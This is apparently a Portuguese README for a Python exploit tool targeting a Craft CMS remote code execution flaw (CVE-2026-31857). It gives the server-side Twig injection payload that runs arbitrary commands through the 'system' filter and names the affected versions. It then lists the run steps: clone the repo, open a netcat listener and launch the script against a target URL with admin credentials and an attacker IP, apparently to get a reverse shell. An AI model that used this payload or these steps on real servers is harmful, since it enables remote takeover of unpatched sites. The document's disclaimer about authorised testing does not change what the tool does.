
Craft CMS RCE via condicionais relacionais no painel de controle
Exploit em Python para uma vulnerabilidade de RCE no painel de administração do Craft CMS, acionada através do endpoint admin/actions/element-indexes/count-elements.
A injeção ocorre através do campo elementIds de uma condição RelatedToConditionRule, que é interpretada como Twig no lado do servidor e explorada através do filtro system para executar um comando arbitrário ({{[['<cmd>']|filter('system')]}}).
Vulnerabilidade divulgada por NeoSprings
Versões afetadas :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3Referências :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
Esta ferramenta é fornecida apenas para fins educativos e exercícios autorizados (CTF, testes de penetração contratados ou testes locais). Utilizá-la contra qualquer sistema sem autorização explícita é ilegal.